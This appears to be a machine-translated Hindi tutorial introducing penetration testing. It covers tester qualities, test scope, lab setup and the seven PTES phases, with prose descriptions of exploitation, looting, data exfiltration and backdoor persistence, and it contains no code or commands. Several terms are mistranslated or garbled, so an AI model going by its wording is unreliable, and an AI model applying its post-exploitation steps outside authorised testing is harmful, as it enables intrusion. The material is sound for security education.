पायथन पेनेट्रेशन टेस्टिंग - क्विक गाइड

पेन परीक्षण या पैठ परीक्षण, कमजोरियों का दोहन करने के लिए कंप्यूटर प्रणाली के खिलाफ साइबर हमले का अनुकरण करके आईटी बुनियादी ढांचे की सुरक्षा का मूल्यांकन करने के प्रयास के रूप में परिभाषित किया जा सकता है।

भेद्यता स्कैनिंग और पैठ परीक्षण के बीच अंतर क्या है? भेद्यता स्कैनिंग केवल उल्लेख की कमजोरियों और पैठ परीक्षण की पहचान करती है, जैसा कि पहले बताया गया है, कमजोरियों का फायदा उठाने का प्रयास है। पेनेट्रेशन परीक्षण यह निर्धारित करने में मदद करता है कि सिस्टम में अनधिकृत पहुंच या कोई अन्य दुर्भावनापूर्ण गतिविधि संभव है या नहीं।

हम सर्वर, वेब एप्लिकेशन, वायरलेस नेटवर्क, मोबाइल डिवाइस और मैन्युअल या स्वचालित तकनीकों का उपयोग करके जोखिम के किसी भी अन्य संभावित बिंदु के लिए पैठ परीक्षण कर सकते हैं। पैठ परीक्षण के कारण, यदि हम किसी भी प्रकार की कमजोरियों का फायदा उठाते हैं, तो रणनीतिक निष्कर्ष पर पहुंचने के लिए आईटी और नेटवर्क सिस्टम प्रबंधक को भेजा जाना चाहिए।

पेनिट्रेशन (पेन) परीक्षण का महत्व

इस खंड में, हम पैठ परीक्षण के महत्व के बारे में जानेंगे। महत्व के बारे में जानने के लिए निम्नलिखित बिंदुओं पर विचार करें -

संगठन की सुरक्षा

पैठ परीक्षण के महत्व को इस बात से समझा जा सकता है कि यह संगठन को उस संगठन की सुरक्षा का विस्तृत मूल्यांकन करने का आश्वासन देता है।

संगठन की गोपनीयता की रक्षा करना

पैठ परीक्षण की सहायता से, हम किसी भी क्षति का सामना करने से पहले संभावित खतरों को पहचान सकते हैं और उस संगठन की गोपनीयता की रक्षा कर सकते हैं।

सुरक्षा नीतियों का कार्यान्वयन

एक संगठन में सुरक्षा नीति के कार्यान्वयन के संबंध में प्रवेश परीक्षण हमें सुनिश्चित कर सकता है।

नेटवर्क दक्षता का प्रबंधन

पैठ परीक्षण की सहायता से, नेटवर्क की दक्षता को प्रबंधित किया जा सकता है। यह फायरवॉल, राउटर आदि जैसे उपकरणों की सुरक्षा की जांच कर सकता है।

संगठन की सुरक्षा सुनिश्चित करें

मान लीजिए अगर हम नेटवर्क डिज़ाइन में किसी बदलाव को लागू करना चाहते हैं या सॉफ्टवेयर, हार्डवेयर आदि को अपडेट करना चाहते हैं, तो पैठ परीक्षण किसी भी तरह की भेद्यता के खिलाफ संगठन की सुरक्षा सुनिश्चित करता है।

एक अच्छा कलम परीक्षक कौन है?

पेनेट्रेशन परीक्षक सॉफ्टवेयर पेशेवर हैं जो संगठनों को कमजोरियों की पहचान करके साइबर हमलों के खिलाफ अपने बचाव को मजबूत करने में मदद करते हैं। एक पैठ परीक्षक परीक्षण के लिए मैनुअल तकनीकों या स्वचालित उपकरणों का उपयोग कर सकता है।

आइए अब हम एक अच्छे प्रवेश परीक्षक की निम्नलिखित महत्वपूर्ण विशेषताओं पर विचार करते हैं -

नेटवर्किंग और अनुप्रयोग विकास का ज्ञान

एक अच्छे पेंटर को एप्लिकेशन डेवलपमेंट, डेटाबेस एडमिनिस्ट्रेशन और नेटवर्किंग का ज्ञान होना चाहिए क्योंकि उसके पास कॉन्फ़िगरेशन सेटिंग्स के साथ-साथ कोडिंग से निपटने की उम्मीद होगी।

उत्कृष्ट विचारक

पेंटेस्टर एक उत्कृष्ट विचारक होना चाहिए और सर्वश्रेष्ठ आउटपुट प्राप्त करने के लिए किसी विशेष असाइनमेंट पर विभिन्न टूल और कार्यप्रणाली को लागू करने में संकोच नहीं करेगा।

प्रक्रिया का ज्ञान

एक अच्छे पेंटर को प्रत्येक प्रवेश परीक्षा के लिए अपने उद्देश्यों, सीमाओं और प्रक्रियाओं के औचित्य के लिए गुंजाइश स्थापित करने के लिए ज्ञान होना चाहिए।

प्रौद्योगिकी में अप-टू-डेट

एक पंचक को अपने तकनीकी कौशल में अप-टू-डेट होना चाहिए क्योंकि कभी भी प्रौद्योगिकी में कोई परिवर्तन हो सकता है।

रिपोर्ट बनाने में निपुण

पैठ परीक्षण को सफलतापूर्वक लागू करने के बाद, एक कलम परीक्षक को अंतिम रिपोर्ट में सभी निष्कर्षों और संभावित जोखिमों का उल्लेख करना चाहिए। इसलिए, उसके पास रिपोर्ट बनाने का अच्छा कौशल होना चाहिए।

साइबर सुरक्षा के बारे में भावुक

भावुक व्यक्ति ही जीवन में सफलता प्राप्त कर सकता है। इसी तरह, यदि कोई व्यक्ति साइबर सिक्योरिटीज का शौक रखता है तो वह एक अच्छा पेन टेस्टर बन सकता है।

पेनेट्रेशन टेस्टिंग स्कोप

अब हम पैठ परीक्षण के दायरे के बारे में जानेंगे। निम्नलिखित दो प्रकार के परीक्षण पैठ परीक्षण के दायरे को परिभाषित कर सकते हैं -

Nondestructive परीक्षण (NDT)

Nondestructive परीक्षण प्रणाली को किसी भी तरह के जोखिम में नहीं डालता है। NDT का उपयोग दोषों को खोजने के लिए किया जाता है, इससे पहले कि वे खतरनाक हो जाएं, सिस्टम, ऑब्जेक्ट आदि को नुकसान पहुंचाए बिना, प्रवेश परीक्षण करते समय, NDT निम्नलिखित क्रियाएं करता है -

रिमोट सिस्टम की स्कैनिंग

यह परीक्षण स्कैन करता है और संभावित कमजोरियों के लिए दूरस्थ प्रणाली की पहचान करता है।

सत्यापन

कमजोरियों को खोजने के बाद, यह उन सभी का सत्यापन भी करता है जो पाए जाते हैं।

रिमोट सिस्टम का उचित उपयोग

NDT में, एक पेन परीक्षक रिमोट सिस्टम को ठीक से उपयोग करेगा। यह रुकावटों से बचने में मदद करता है।

Note - दूसरी ओर, पैठ परीक्षण करते समय, NDT प्रदर्शन नहीं करता है Denial-of-Service (DoS) attack

विनाशकारी परीक्षण

विनाशकारी परीक्षण प्रणाली को जोखिम में डाल सकता है। यह अधिक महंगा है और nondestructive परीक्षण की तुलना में अधिक कौशल की आवश्यकता है। प्रवेश परीक्षण करते समय, विनाशकारी परीक्षण निम्नलिखित क्रियाएं करता है -

  • Denial-of-Service (DoS) attack - विनाशकारी परीक्षण DoS हमले करता है।

  • Buffer overflow attack - यह बफर ओवरफ्लो अटैक भी करता है जिससे सिस्टम क्रैश हो सकता है।

अभ्यास प्रवेश परीक्षण के लिए क्या स्थापित करें?

पैठ परीक्षण तकनीकों और उपकरणों को केवल उन वातावरणों में निष्पादित किया जाना चाहिए जिनके आप स्वामी हैं या इन उपकरणों को चलाने की अनुमति है। हमें इन तकनीकों का उन वातावरणों में कभी भी अभ्यास नहीं करना चाहिए जिनमें, हम ऐसा करने के लिए अधिकृत नहीं हैं क्योंकि बिना अनुमति के प्रवेश परीक्षण अवैध है।

  • हम वर्चुअलाइजेशन सूट स्थापित करके पैठ परीक्षण का अभ्यास कर सकते हैं - या तो VMware Player( www.vmware.com/products/player ) याOracle VirtualBox -

    www.oracle.com/technetwork/server-storage/virtualbox/downloads/index.html

  • हम वर्चुअल मशीन (VM) को वर्तमान संस्करण से बाहर भी बना सकते हैं -

    • काली लिनक्स ( www.kali.org/downloads/ )

    • समुराई वेब परीक्षण रूपरेखा (http://samurai.inguardians.com/)

    • Metasploitable ( www.offensivesecurity.com/metasploit-unleashed/Requirements )

हाल के दिनों में, सरकारी और निजी दोनों संगठनों ने साइबर सुरक्षा को एक रणनीतिक प्राथमिकता के रूप में लिया है। साइबर अपराधियों ने अक्सर अलग-अलग हमलावर वैक्टरों का उपयोग करके सरकारी और निजी संगठनों को अपना नरम निशाना बनाया है। दुर्भाग्य से, कुशल नीतियों, मानकों और सूचना प्रणाली की जटिलता की कमी के कारण, साइबर अपराधियों के पास बड़ी संख्या में लक्ष्य हैं और वे सिस्टम का फायदा उठाने और जानकारी चुराने में भी सफल हो रहे हैं।

पेनेट्रेशन परीक्षण एक ऐसी रणनीति है जिसका उपयोग साइबर हमले के जोखिमों को कम करने के लिए किया जा सकता है। पैठ परीक्षण की सफलता एक कुशल और सुसंगत मूल्यांकन पद्धति पर निर्भर करती है।

हमारे पास पैठ परीक्षण से संबंधित विभिन्न प्रकार की मूल्यांकन पद्धति है। एक कार्यप्रणाली का उपयोग करने का लाभ यह है कि यह मूल्यांकनकर्ताओं को लगातार पर्यावरण का मूल्यांकन करने की अनुमति देता है। निम्नलिखित कुछ महत्वपूर्ण तरीके हैं -

  • ओपन सोर्स सिक्योरिटी टेस्टिंग मेथोलॉजी मैनुअल (OSSTMM)

  • वेब अनुप्रयोग सुरक्षा परियोजना (OWASP) खोलें

  • राष्ट्रीय मानक और प्रौद्योगिकी संस्थान (NIST)

  • प्रवेश परीक्षण निष्पादन मानक (PTES)

PTES क्या है?

पीटीईएस, पैठ परीक्षण निष्पादन मानक, जैसा कि नाम का अर्थ है पैठ परीक्षण के लिए एक मूल्यांकन पद्धति है। यह एक प्रवेश परीक्षा से जुड़ी हर चीज को कवर करता है। हमारे पास कई तकनीकी दिशानिर्देश हैं, जो पीटीईएस के भीतर हैं, विभिन्न वातावरणों से संबंधित है जो एक मूल्यांकनकर्ता का सामना कर सकता है। नए मूल्यांकनकर्ताओं द्वारा पीटीईएस का उपयोग करने का यह सबसे बड़ा लाभ है क्योंकि तकनीकी दिशानिर्देशों में उद्योग मानक उपकरणों के भीतर पर्यावरण को संबोधित करने और मूल्यांकन करने के लिए सुझाव हैं।

निम्नलिखित अनुभाग में, हम पीटीईएस के विभिन्न चरणों के बारे में जानेंगे।

पीटीईएस के सात चरण

प्रवेश परीक्षण निष्पादन मानक (PTES) में सात चरण होते हैं। ये चरण एक प्रवेश परीक्षा से संबंधित सभी चीज़ों को कवर करते हैं - प्रारंभिक संचार से और एक कीट के पीछे तर्क, खुफिया एकत्रीकरण और धमकी चरणों के माध्यम से जहां परीक्षक पर्दे के पीछे काम कर रहे हैं। यह भेद्यता अनुसंधान, शोषण और बाद के शोषण के माध्यम से परीक्षण संगठन की बेहतर समझ की ओर जाता है। यहां, परीक्षकों की तकनीकी सुरक्षा विशेषज्ञता को गंभीर रूप से जुड़ाव की व्यावसायिक समझ के साथ जोड़ा जाता है, और अंत में रिपोर्टिंग को, जो पूरी प्रक्रिया को कैप्चर करता है, एक तरीके से जो ग्राहक को समझ में आता है और इसे सबसे अधिक मूल्य प्रदान करता है।

हम अपने बाद के अनुभागों में पीटीईएस के सात चरणों के बारे में जानेंगे -

पूर्व-सहभागिता सहभागिता चरण

यह पीटीईएस का पहला और बहुत महत्वपूर्ण चरण है। इस चरण का मुख्य उद्देश्य उपलब्ध साधनों और तकनीकों की व्याख्या करना है, जो एक प्रवेश परीक्षा के सफल पूर्व-सगाई कदम में मदद करते हैं। इस चरण को लागू करते समय कोई भी गलती बाकी मूल्यांकन पर महत्वपूर्ण प्रभाव डाल सकती है। इस चरण में निम्नलिखित शामिल हैं -

एक आकलन के लिए अनुरोध

पहला चरण जिसके साथ यह चरण शुरू होता है, संगठन द्वारा मूल्यांकन के लिए अनुरोध का निर्माण होता है। एRequest for Proposal (RFP) दस्तावेज में पर्यावरण के बारे में विवरण, मूल्यांकन की आवश्यकता और संगठन की अपेक्षाओं को मूल्यांकनकर्ताओं को प्रदान किया गया है।

बिडिंग

अब, के आधार पर RFP दस्तावेज़, कई मूल्यांकन फर्म या व्यक्तिगत लिमिटेड देयता निगम (एलएलसी) बोली लगाएंगे और पार्टी, जिनमें से बोली अनुरोध किए गए कार्य से मेल खाती है, कीमत और कुछ अन्य विशिष्ट पैरामीटर जीतेंगे।

सगाई पत्र (ईएल) पर हस्ताक्षर

अब, संगठन और पार्टी, जिसने बोली जीती, सगाई पत्र (ईएल) के एक अनुबंध पर हस्ताक्षर करेंगे। चिट्ठी होगीstatement of work (SOW) और अंतिम उत्पाद।

स्कोपिंग मीटिंग

एक बार ईएल पर हस्ताक्षर होने के बाद, स्कोप की फाइन-ट्यूनिंग शुरू हो सकती है। इस तरह की बैठकें एक संगठन और पार्टी को एक विशेष दायरे को ठीक करने में मदद करती हैं। स्कोप बैठक का मुख्य लक्ष्य यह चर्चा करना है कि क्या परीक्षण किया जाएगा।

गुंजाइश रेंगना की हैंडलिंग

स्कोप रेंगना एक ऐसी चीज है, जहां ग्राहक काम करने के लिए वादा किए गए स्तर को जोड़ने या बढ़ाने का प्रयास कर सकता है, जितना उसने भुगतान करने का वादा किया है। इसीलिए समय और संसाधनों के कारण मूल गुंजाइश के संशोधनों पर सावधानीपूर्वक विचार किया जाना चाहिए। इसे कुछ प्रलेखित प्रपत्र जैसे ईमेल, हस्ताक्षरित दस्तावेज़ या अधिकृत पत्र आदि में भी पूरा किया जाना चाहिए।

प्रश्नावली

ग्राहक के साथ प्रारंभिक संचार के दौरान, कई सवाल हैं जो ग्राहक को सगाई के दायरे के उचित आकलन के लिए जवाब देना होगा। इन प्रश्नों को एक बेहतर समझ प्रदान करने के लिए डिज़ाइन किया गया है कि ग्राहक पैठ परीक्षण से क्या हासिल करना चाहता है; ग्राहक अपने पर्यावरण के खिलाफ किए गए पैठ परीक्षण को क्यों देख रहे हैं; और, वे प्रवेश परीक्षा के दौरान किए गए कुछ प्रकार के परीक्षणों को चाहते हैं या नहीं।

परीक्षण करने का तरीका

पूर्व-सगाई चरण का अंतिम भाग परीक्षण का संचालन करने की प्रक्रिया तय करना है। चुनने के लिए व्हाइट बॉक्स, ब्लैक बॉक्स, ग्रे बॉक्स, डबल-ब्लाइंड परीक्षण जैसी विभिन्न परीक्षण रणनीतियाँ हैं।

अनुरोध के कुछ उदाहरण निम्नलिखित हैं -

  • नेटवर्क पैठ परीक्षण
  • वेब अनुप्रयोग प्रवेश परीक्षा
  • वायरलेस नेटवर्क पैठ परीक्षण
  • शारीरिक प्रवेश परीक्षा
  • सोशल इंजीनियरिंग
  • Phishing
  • वॉइस ओवर इंटरनेट प्रोटोकॉल (वीओआइपी)
  • आंतरिक नेटवर्क
  • बाहरी नेटवर्क

इंटेलिजेंस गैदरिंग चरण

इंटेलिजेंस सभा, पीटीईएस का दूसरा चरण है, जहां हम लक्ष्य निर्धारण के खिलाफ प्रारंभिक सर्वेक्षण करते हैं ताकि भेद्यता मूल्यांकन और शोषण के चरणों के दौरान लक्ष्य को भेदते समय अधिक से अधिक जानकारी एकत्र की जा सके। यह मूल्यांकन टीम द्वारा बाहरी जोखिम को निर्धारित करने में संगठनों की मदद करता है। हम निम्नलिखित तीन स्तरों में जानकारी एकत्रित कर सकते हैं -

स्तर 1 सूचना इकट्ठा करना

स्वचालित उपकरण लगभग पूरी तरह से सूचना के इस स्तर को प्राप्त कर सकते हैं। अनुपालन की आवश्यकता को पूरा करने के लिए स्तर 1 सूचना एकत्र करने का प्रयास उचित होना चाहिए।

स्तर 2 सूचना इकट्ठा करना

कुछ मैनुअल विश्लेषण के साथ स्तर 1 से स्वचालित टूल का उपयोग करके इस स्तर की जानकारी प्राप्त की जा सकती है। इस स्तर को व्यवसाय की अच्छी समझ की आवश्यकता है, जिसमें भौतिक स्थान, व्यावसायिक संबंध, संगठन चार्ट आदि जैसी जानकारी शामिल है, स्तर 2 की जानकारी एकत्र करने का प्रयास अन्य आवश्यकताओं जैसे कि दीर्घकालिक सुरक्षा रणनीति, के साथ अनुपालन आवश्यकता को पूरा करने के लिए उपयुक्त होना चाहिए। छोटे निर्माताओं, आदि का अधिग्रहण

स्तर 3 सूचना इकट्ठा करना

सूचना के इस स्तर का उपयोग सबसे उन्नत पैठ परीक्षण में किया जाता है। लेवल 3 की जानकारी एकत्र करने के लिए लेवल 1 और लेवल 2 के साथ-साथ बहुत सारे मैनुअल विश्लेषण की आवश्यकता होती है।

धमकी मॉडलिंग चरण

यह पीटीईएस का तीसरा चरण है। प्रवेश परीक्षण के सही निष्पादन के लिए थ्रेट मॉडलिंग दृष्टिकोण आवश्यक है। धमकी मॉडलिंग का उपयोग पैठ परीक्षण के हिस्से के रूप में किया जा सकता है या कई कारकों के आधार पर इसका सामना करना पड़ सकता है। यदि हम प्रवेश परीक्षा के भाग के रूप में धमकी मॉडलिंग का उपयोग कर रहे हैं, तो दूसरे चरण में एकत्रित जानकारी को पहले चरण में वापस ले जाया जाएगा।

निम्नलिखित चरण खतरे वाले मॉडलिंग चरण का निर्माण करते हैं -

  • आवश्यक और प्रासंगिक जानकारी इकट्ठा करें।

  • प्राथमिक और द्वितीयक संपत्तियों की पहचान और वर्गीकरण करने की आवश्यकता है।

  • खतरों और खतरे समुदायों को पहचानने और वर्गीकृत करने की आवश्यकता है।

  • प्राथमिक और माध्यमिक परिसंपत्तियों के खिलाफ खतरे वाले समुदायों को मैप करने की आवश्यकता है।

धमकी समुदायों और एजेंटों

निम्नलिखित तालिका संगठन में उनके स्थान के साथ प्रासंगिक खतरे समुदायों और एजेंटों को सूचीबद्ध करती है -

स्थान अंदर का बाहरी
Threat agents/communities कर्मचारियों व्यापार भागीदार
प्रबंधन के लोग ठेकेदारों
व्यवस्थापक (नेटवर्क, सिस्टम) प्रतियोगियों
इंजीनियर्स आपूर्तिकर्ताओं
तकनीशियनों देश राज्य
सामान्य उपयोगकर्ता समुदाय हैकर्स

धमकी-मॉडलिंग मूल्यांकन करते समय, हमें यह याद रखना चाहिए कि खतरों का स्थान आंतरिक हो सकता है। यह केवल एक फ़िशिंग ई-मेल या एक नाराज़ कर्मचारी लेता है जो क्रेडेंशियल प्रसारित करके संगठन की सुरक्षा को दांव पर रख रहा है।

भेद्यता विश्लेषण चरण

यह पीटीईएस का चौथा चरण है जिसमें मूल्यांकनकर्ता आगे के परीक्षण के लिए संभव लक्ष्यों की पहचान करेगा। पीटीईएस के पहले तीन चरणों में, केवल संगठन के बारे में विवरण निकाला गया है और मूल्यांकनकर्ता ने परीक्षण के लिए किसी भी संसाधन को नहीं छुआ है। यह पीटीईएस का सबसे अधिक समय लेने वाला चरण है।

निम्नलिखित चरण कमजोरता विश्लेषण का गठन करते हैं -

भेद्यता परीक्षण

इसे सिस्टम और होस्ट और सेवाओं के अनुप्रयोगों में ग़लतफ़हमी और असुरक्षित एप्लिकेशन डिज़ाइन जैसी खामियों की खोज की प्रक्रिया के रूप में परिभाषित किया जा सकता है। परीक्षक को भेद्यता विश्लेषण करने से पहले परीक्षण और वांछित परिणाम को ठीक से निर्धारित करना चाहिए। भेद्यता परीक्षण निम्न प्रकार के हो सकते हैं -

  • सक्रिय परीक्षण
  • निष्क्रिय परीक्षण

हम अपने बाद के खंडों में दो प्रकारों के बारे में विस्तार से चर्चा करेंगे।

सक्रिय परीक्षण

इसमें सुरक्षा कमजोरियों के लिए परीक्षण किए जा रहे घटक के साथ सीधी बातचीत शामिल है। घटक निम्न स्तर पर हो सकते हैं जैसे कि नेटवर्क डिवाइस पर टीसीपी स्टैक या उच्च स्तर पर जैसे वेब आधारित इंटरफ़ेस। सक्रिय परीक्षण निम्नलिखित दो तरीकों से किया जा सकता है -

स्वचालित सक्रिय परीक्षण

यह एक लक्ष्य के साथ बातचीत करने, प्रतिक्रियाओं की जांच करने और इन प्रतिक्रियाओं के आधार पर निर्धारित करने के लिए सॉफ़्टवेयर का उपयोग करता है कि घटक में भेद्यता मौजूद है या नहीं। मैन्युअल सक्रिय परीक्षण की तुलना में स्वचालित सक्रिय परीक्षण के महत्व को इस तथ्य से महसूस किया जा सकता है कि यदि सिस्टम पर हजारों टीसीपी पोर्ट हैं और हमें उन सभी को मैन्युअल रूप से परीक्षण के लिए कनेक्ट करने की आवश्यकता है, तो यह काफी बड़ी मात्रा में समय लगेगा। हालांकि, स्वचालित उपकरणों के साथ इसे करने से बहुत समय और श्रम आवश्यकताएं कम हो सकती हैं। नेटवर्क भेद्यता स्कैन, पोर्ट स्कैन, बैनर हथियाने, वेब एप्लिकेशन स्कैन स्वचालित सक्रिय परीक्षण उपकरणों की मदद से किया जा सकता है।

मैनुअल सक्रिय परीक्षण

स्वचालित सक्रिय परीक्षण की तुलना में मैन्युअल प्रभावी परीक्षण अधिक प्रभावी होता है। त्रुटि का मार्जिन हमेशा स्वचालित प्रक्रिया या प्रौद्योगिकी के साथ मौजूद होता है। यही कारण है कि स्वचालित परीक्षण के परिणाम को मान्य करने के लिए हमेशा एक लक्ष्य प्रणाली पर उपलब्ध प्रत्येक प्रोटोकॉल या सेवा के लिए मैनुअल प्रत्यक्ष कनेक्शन को निष्पादित करने की सिफारिश की जाती है।

निष्क्रिय परीक्षण

निष्क्रिय परीक्षण में घटक के साथ प्रत्यक्ष बातचीत शामिल नहीं है। इसे निम्नलिखित दो तकनीकों की मदद से लागू किया जा सकता है -

मेटाडेटा विश्लेषण

इस तकनीक में उस डेटा को देखना शामिल है जो फ़ाइल के डेटा के बजाय फ़ाइल का वर्णन करता है। उदाहरण के लिए, एमएस शब्द फ़ाइल में अपने लेखक का नाम, कंपनी का नाम, दिनांक और समय के संदर्भ में मेटाडेटा है जब दस्तावेज़ को अंतिम रूप से संशोधित और सहेजा गया था। यदि कोई हमलावर मेटाडेटा के लिए निष्क्रिय पहुँच प्राप्त कर सकता है तो सुरक्षा समस्या होगी।

यातायात की निगरानी

इसे आंतरिक नेटवर्क से कनेक्ट करने और ऑफ़लाइन विश्लेषण के लिए डेटा कैप्चर करने की तकनीक के रूप में परिभाषित किया जा सकता है। यह मुख्य रूप से कब्जा करने के लिए उपयोग किया जाता है“leaking of data” एक स्विच्ड नेटवर्क पर।

मान्यकरण

भेद्यता परीक्षण के बाद, निष्कर्षों का सत्यापन बहुत आवश्यक है। यह निम्नलिखित तकनीकों की सहायता से किया जा सकता है -

औजारों के बीच सहसंबंध

यदि एक मूल्यांकनकर्ता कई स्वचालित उपकरणों के साथ भेद्यता परीक्षण कर रहा है तो निष्कर्षों को मान्य करने के लिए, इन उपकरणों के बीच सहसंबंध होना बहुत आवश्यक है। उपकरण के बीच इस तरह के सहसंबंध नहीं होने पर निष्कर्ष जटिल हो सकते हैं। इसे वस्तुओं के विशिष्ट सहसंबंध और वस्तुओं के श्रेणीबद्ध सहसंबंध में तोड़ा जा सकता है।

प्रोटोकॉल विशिष्ट सत्यापन

मान्यताओं को प्रोटोकॉल की मदद से भी किया जा सकता है। वीपीएन, सिट्रिक्स, डीएनएस, वेब, मेल सर्वर का उपयोग निष्कर्षों को मान्य करने के लिए किया जा सकता है।

अनुसंधान

किसी सिस्टम में भेद्यता की खोज और सत्यापन के बाद, इस मुद्दे की पहचान की सटीकता निर्धारित करना और पैठ परीक्षण के दायरे के भीतर भेद्यता के संभावित दोहन का अनुसंधान करना आवश्यक है। अनुसंधान सार्वजनिक या निजी तौर पर किया जा सकता है। सार्वजनिक अनुसंधान करते समय, भेद्यता डेटाबेस और विक्रेता सलाह का उपयोग किसी रिपोर्ट किए गए मुद्दे की सटीकता को सत्यापित करने के लिए किया जा सकता है। दूसरी ओर, निजी शोध करते समय, एक प्रतिकृति वातावरण सेट किया जा सकता है और किसी रिपोर्ट की सटीकता को सत्यापित करने के लिए फ़ज़िंग या परीक्षण कॉन्फ़िगरेशन जैसी तकनीकों को लागू किया जा सकता है।

शोषण का दौर

यह पीटीईएस का पांचवा चरण है। यह चरण सुरक्षा प्रतिबंधों को दरकिनार करके सिस्टम या संसाधन तक पहुंच प्राप्त करने पर केंद्रित है। इस चरण में, पिछले चरणों द्वारा किए गए सभी कार्य सिस्टम तक पहुंच प्राप्त करते हैं। सिस्टम तक पहुँच प्राप्त करने के लिए उपयोग किए जाने वाले कुछ सामान्य शब्द हैं -

  • Popped
  • Shelled
  • Cracked
  • Exploited

सिस्टम में लॉगिंग, शोषण चरण में, कोड की मदद से किया जा सकता है, रिमोट शोषण, शोषण का निर्माण, एंटीवायरस को दरकिनार करना या यह कमजोर साख के माध्यम से लॉगिंग के रूप में सरल हो सकता है। एक्सेस प्राप्त करने के बाद, यानी, मुख्य प्रवेश बिंदु की पहचान करने के बाद, मूल्यांकनकर्ता को उच्च मूल्य लक्ष्य संपत्ति की पहचान करने पर ध्यान केंद्रित करना चाहिए। यदि भेद्यता विश्लेषण चरण ठीक से पूरा हो गया था, तो एक उच्च मूल्य लक्ष्य सूची का अनुपालन किया जाना चाहिए था। अंत में, हमले के वेक्टर को संगठन में सफलता की संभावना और उच्चतम प्रभाव को ध्यान में रखना चाहिए।

शोषण के बाद का चरण

यह पीटीईएस का छठा चरण है। एक मूल्यांकनकर्ता इस चरण में निम्नलिखित गतिविधियां करता है -

अवसंरचना विश्लेषण

पैठ परीक्षण के दौरान उपयोग किए जाने वाले संपूर्ण बुनियादी ढांचे का विश्लेषण इस चरण में किया जाता है। उदाहरण के लिए, नेटवर्क या नेटवर्क कॉन्फ़िगरेशन का विश्लेषण इंटरफेस, रूटिंग, डीएनएस सर्वर, कैश्ड डीएनएस प्रविष्टियों, प्रॉक्सी सर्वर, आदि की मदद से किया जा सकता है।

लूटने

इसे लक्षित मेजबानों से सूचना प्राप्त करने के रूप में परिभाषित किया जा सकता है। यह जानकारी पूर्व-मूल्यांकन चरण में परिभाषित लक्ष्यों के लिए प्रासंगिक है। यह जानकारी संस्थापित प्रोग्राम, डेटाबेस सर्वर के विशिष्ट सर्वर, प्रिंटर, आदि से प्राप्त की जा सकती है।

डेटा बहिष्कार

इस गतिविधि के तहत, मूल्यांकनकर्ता को सभी संभावित एक्सफ़िलिएशन रास्तों की मैपिंग और परीक्षण करने की आवश्यकता होती है, ताकि संगठन से संवेदनशील जानकारी को मापने, यानी नियंत्रण शक्ति का पता लगाने और अवरुद्ध करने का कार्य किया जा सके।

हठ पैदा करना

इस गतिविधि में बैकडोर की स्थापना शामिल है जिसमें प्रमाणीकरण की आवश्यकता होती है, आवश्यकता होने पर बैकस्टोड को रिबूट करना और जटिल पासवर्ड के साथ वैकल्पिक खातों का निर्माण।

साफ - सफाई

जैसा कि नाम से पता चलता है, यह प्रक्रिया पैठ की परीक्षा पूरी होने के बाद सिस्टम की सफाई की आवश्यकताओं को कवर करती है। इस गतिविधि में मूल मान सिस्टम सेटिंग्स, एप्लिकेशन कॉन्फ़िगरेशन पैरामीटर, और स्थापित सभी पिछले दरवाजे को हटाने और बनाए गए किसी भी उपयोगकर्ता खाते में वापसी शामिल है।

रिपोर्टिंग

यह PTES का अंतिम और सबसे महत्वपूर्ण चरण है। यहां, ग्राहक पैठ परीक्षण पूरा होने के बाद अंतिम रिपोर्ट के आधार पर भुगतान करता है। रिपोर्ट मूल रूप से सिस्टम के बारे में मूल्यांकनकर्ता द्वारा किए गए निष्कर्षों का दर्पण है। निम्नलिखित एक अच्छी रिपोर्ट के आवश्यक भाग हैं -

कार्यकारी सारांश

यह एक ऐसी रिपोर्ट है जो पाठक को पैठ परीक्षण के विशिष्ट लक्ष्यों और परीक्षण अभ्यास के उच्च स्तरीय निष्कर्षों के बारे में बताती है। इच्छित दर्शक मुख्य सुइट के सलाहकार बोर्ड के सदस्य हो सकते हैं।

कहानी

रिपोर्ट में एक स्टोरीलाइन होनी चाहिए, जो बताएगी कि सगाई के दौरान क्या किया गया था, वास्तविक सुरक्षा निष्कर्ष या कमजोरियां और सकारात्मक नियंत्रण जो संगठन ने स्थापित किए हैं।

अवधारणा / तकनीकी रिपोर्ट का प्रमाण

अवधारणा या तकनीकी रिपोर्ट के सबूत में परीक्षण के तकनीकी विवरण और पूर्व सगाई अभ्यास के भीतर प्रमुख सफलता संकेतक के रूप में सहमत सभी पहलुओं / घटकों को शामिल करना चाहिए। तकनीकी रिपोर्ट अनुभाग परीक्षण के दायरे, सूचना, हमले के मार्ग, प्रभाव और उपचारात्मक सुझावों का विस्तार से वर्णन करेगा।

हमने हमेशा सुना है कि पैठ परीक्षण करने के लिए, एक पंचक को आईपी पते, क्लासफुल सबनेटिंग, क्लासलेस सबनेटिंग, बंदरगाहों और प्रसारण नेटवर्क जैसी बुनियादी नेटवर्किंग अवधारणाओं के बारे में पता होना चाहिए। पहला कारण यह है कि मेजबान जैसी गतिविधियाँ स्वीकृत दायरे में रहती हैं और जो सेवाएँ, बंदरगाह और सुविधाएँ उनके पास हैं वे खुले और उत्तरदायी हैं, यह निर्धारित करेगा कि पैठ परीक्षण में मूल्यांकनकर्ता किस तरह की गतिविधियाँ करने जा रहा है। वातावरण बदलता रहता है और सिस्टम अक्सर वास्तविक हो जाता है। इसलिए, यह बहुत संभव है कि पुरानी कमजोरियां फिर से फसल ले सकती हैं और एक नेटवर्क को स्कैन करने के अच्छे ज्ञान के बिना, ऐसा हो सकता है कि प्रारंभिक स्कैन को फिर से करना होगा। हमारे बाद के अनुभागों में, हम नेटवर्क संचार की मूल बातें पर चर्चा करेंगे।

संदर्भ मॉडल

संदर्भ मॉडल मानकीकरण का एक साधन प्रदान करता है, जो दुनिया भर में स्वीकार्य है क्योंकि कंप्यूटर नेटवर्क का उपयोग करने वाले लोग एक विस्तृत भौतिक सीमा पर स्थित हैं और उनके नेटवर्क उपकरणों में विषम वास्तुकला हो सकती है। विषम उपकरणों के बीच संचार प्रदान करने के लिए, हमें एक मानकीकृत मॉडल, यानी, एक संदर्भ मॉडल की आवश्यकता होती है, जो हमें इन उपकरणों को संचार करने के तरीके से प्रदान करेगा।

हमारे पास दो संदर्भ मॉडल हैं जैसे कि OSI मॉडल और TCP / IP संदर्भ मॉडल। हालाँकि, OSI मॉडल एक काल्पनिक है लेकिन TCP / IP एक व्यावहारिक मॉडल है।

ओ एस आई मॉडल

ओपन सिस्टम इंटरफेस को अंतर्राष्ट्रीय संगठन मानकीकरण (आईएसओ) द्वारा डिजाइन किया गया था और इसलिए, इसे आईएसओ-ओएसआई मॉडल के रूप में भी जाना जाता है।

